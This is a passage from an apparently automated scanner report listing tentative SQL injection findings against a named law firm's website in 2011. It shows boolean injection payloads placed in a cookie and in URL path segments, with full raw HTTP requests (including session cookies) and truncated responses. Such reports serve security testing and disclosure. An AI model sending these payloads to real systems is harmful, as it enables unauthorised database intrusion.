The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 18153507'%20or%201%3d1--%20 and 18153507'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=18153507'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Wed, 12-May-2010 16:11:54 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=18153507'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.85. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14260958'%20or%201%3d1--%20 and 14260958'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts14260958'%20or%201%3d1--%20/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:12:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts14260958'%20or%201%3d2--%20/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.86. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 64052056'%20or%201%3d1--%20 and 64052056'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images64052056'%20or%201%3d1--%20/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:12:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts/images64052056'%20or%201%3d2--%20/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.87. http://www.pillsburylaw.com/scripts/images/arrows-default.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19323163'%20or%201%3d1--%20 and 19323163'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png19323163'%20or%201%3d1--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:12:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts/images/arrows-default.png19323163'%20or%201%3d2--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.88. http://www.pillsburylaw.com/scripts/images/arrows-default.png [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
